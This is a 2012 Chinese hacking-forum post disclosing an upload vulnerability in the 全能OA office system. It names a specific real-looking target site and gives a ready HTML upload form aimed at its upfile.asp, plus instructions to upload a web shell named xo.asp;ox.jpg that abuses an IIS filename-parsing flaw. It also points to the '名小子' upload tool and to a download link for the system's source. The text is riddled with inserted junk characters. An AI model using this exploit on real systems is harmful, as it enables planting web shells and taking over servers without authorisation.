找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2277|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
全能OA办公系统 上传漏洞
" ]- k/ u6 X3 A$ l- g
" D: B$ D# n7 C/ D9 H; U( Y系统介绍:+ ?3 l9 h" S! R

, Y* }  j1 s; l$ l全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。9 W2 X/ E2 z, J/ j/ F7 W' ?& Y" f

3 o8 W8 e) o1 w9 {9 x$ f  U) h' d' Y主要功能:
- S. i% E7 N. j" T: K# W公司通告 - `" V9 w' r) h% {/ K/ c  _# T
工作计划 5 v, P' U" W3 t* @
通讯助理 0 I3 u0 D% f$ W8 X9 e; j* X1 l
客户资源 : U' t" [9 v' _
我的公文
# B. T$ |8 ~4 U7 l公文传阅
7 l  U0 E" [/ H1 k) R& t公共资源
# ?5 f; c8 y8 s! z8 n0 Z资源预约
! ^0 B0 z' @. P- \' }. z今日考勤
0 y; M" J% U$ h2 x% Q个人计划 + t+ ]# _0 C7 G8 x
个人通讯录 2 R0 @' k  r2 p
个人基本档案   w) |! }& O+ b8 Y$ C
未读邮件 8 A$ E# w1 g* {& W1 ]
发邮件 8 P6 n) ~$ L. M& H# a( W- B
收件夹 + Z) C. v" Z$ I/ z" s$ J; y
寄件夹
; t& }8 D- r' ^6 P7 s5 s$ p网络硬盘
: _/ p- K* m0 V  h+ x9 Z网络会议 ; y) ~5 R/ h2 C; A
网络调查 ' M4 t; z: D# F/ _& a
交流论坛
" Y2 k1 J; E, l' s" n. Y, E+ v2 b3 a# {1 ]% X
有兴趣测试的朋友可以下源码看看
2 ]6 ?; a2 r8 G/ C$ h% {* s, w8 E
8 j1 ^2 i% A# G4 _9 D8 ^/ J: l3 h源码下载:
8 c/ }4 Q! H0 I; a# B( L, ~4 I! E& k( l- D! X
http://www.mycodes.net/30/4750.htm
1 ]% Y2 [5 a* h4 {: C- g2 v, _% p$ N5 l, g$ T/ ~( u" ^" r7 g9 |" A$ z/ T
漏洞介绍:
* k4 `6 k% l! }; n! t
! o8 B8 @6 A$ e* {/ n由upfile.asp上传文件漏洞引起/ t  c) c0 F# B( @
0 u; z& G) z% \$ P1 ]2 k& `
测试方法:- I+ i; G+ @1 E  I

6 f$ O0 B" T; S  {1 P使用名小子上传http://www.itlynn.com/upfile.asp即可
9 }8 v3 X, W& W( {" w) `
! f, }# A0 `$ u& S; T7 N: H& [$ }如果upfile.asp文件被删除不存在。7 w5 G/ c9 d5 ?" B3 M- L7 X( p
5 ^3 N7 z2 z. Q
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp$ }; R& _2 w8 n7 l9 z

, A: U% }9 \. H* b) c0 o- j如果存在那么将如下代码保存为upfile.html。7 Z  a( e9 n4 U# p& a

+ ~& q" e( v% h0 \然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp9 ?6 l6 q. a+ X, R* B" x) e; [/ I

4 k' r( u: F2 G5 o" T& _1 } 8 O+ q1 f( Q5 _6 d
, A( A# ^' L* v5 o! e2 f% f
01 <table border='0' align="center" cellpadding="5">
' P" d2 l9 S5 k1 Z0 v" \( g
, B) U1 ^0 S3 h3 i8 l$ E8 O: \# f02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> * }, X  I' Q% u  x7 o6 V- Q
+ }" H5 J9 c! G3 P5 t  x9 _& ^
03 <tr> ( P; b4 E6 O" ~0 q( G( \7 x
" ^# b3 i; i$ T5 q' P
04             <td>报错:</td>
  i4 T0 F9 _) |+ V
5 g) h$ T, \& S7 A+ M05             <td><input type='radio' name='errnumber' value='0'> & O/ Y7 G. s" J: R) G1 d  o
: K$ N& `- y" L/ w5 H
06               自动更名
9 T  I& l) Z8 X& x+ q" z. x" ^# j7 m" I+ |/ O( z
07               <input type='radio' name='errnumber' value='1' checked> $ z: |7 u/ r5 {( x% ^% v) w( U
! S8 t/ n/ q5 a' r
08               报错方式
; x: y5 a) e( u5 z" o; Z  x
# w: U' v7 {' z& _6 T/ \09               <input type='radio' name='errnumber' value='2'>
) M- _+ P& X: T' I( S
# t) p" X" Z0 p4 i& q0 m5 Z9 d10               直接覆盖</td> 9 ]% r/ s4 _4 I2 D

0 \$ V7 r# C3 i3 _1 _11           </tr>
, T# s5 ~7 E8 N. m# V" V
. P* U4 r9 ?) E; I12           <tr>   g9 H* a6 l  T3 N" f" @. B3 ~$ L
9 D$ O7 e1 A; x) s
13             <td>主题:</td>
2 Y3 u: W* K$ W1 a+ o- ?
% B. \' Q- T+ t: T5 p. d1 K. ?14             <td><input type='text' name='filename' size='30'></td>
9 G, r( R6 k/ v% @: X8 I+ d- `$ U: l* O9 s; @# S1 j4 w
15           </tr>
4 c1 k, J+ b: e% B: A$ a  D+ o4 S
' ~0 G% q4 v+ ?7 a9 H) j5 `16           <tr>
( @  ?$ R' `6 g# a2 T! G) l0 o4 p1 ]! Z# Z0 O$ q" V
17             <td>文件:</td> ; r% P/ s2 G1 q+ f1 `6 X
4 {0 p4 J  Y/ e; y4 a
18             <td><input type="file"name="fruit"size="30"></td> ! y4 ~! I4 h: y" J+ a
# N; L: ~/ i5 t8 F; Q
19           </tr>   o3 \% t* F; U

. t% c5 q; v' |( R20           <tr>
# O; ?' l1 I# Q- u( @8 w
; C  g% w. s+ {, L% Q/ s" W, x21             <td valign='top'>简介:</td> % J- d# T$ v  U! u# W& i

: w* Q: I) z4 k2 \9 }0 b1 M22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> + O; B8 v3 F$ P) x, [& F
0 j: m+ g* ^; y1 m! N" z
23           </tr>
! P. ^# _; P0 L0 W7 c- `" o$ c) @  Z( {/ V7 y- R
24   
& p# I: Z) g: t! _6 P# }& J; `+ A- i- h
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
" ]) I6 [, [2 d* H& ~9 |. U0 m4 S2 |4 _  Z0 S* U& r
26           </tr>
( [1 j! p3 j8 B* O; M2 f  A
$ f5 c! T. Z" ^7 K/ D% \8 m; {27         </form>
- N( W$ j) c* {0 l3 B9 t* X; S0 L* y1 A$ Y: t6 h
然后打开上传一个文件名为xo.asp;ox.jpg的文件。: X* R- L/ l7 `+ v

! \% R! b8 ~' Q8 M& Y) A# r8 K $ B. T& Z4 ^) d" c* M+ O
  i7 T5 k" r( D2 H, y/ k
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
1 r6 r8 s$ `/ M) {; a/ u$ i! f- n9 V* @5 j
此漏洞需要配合解析漏洞利用。
7 U5 D$ s/ |; u. S8 q% J/ g: _9 _  G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表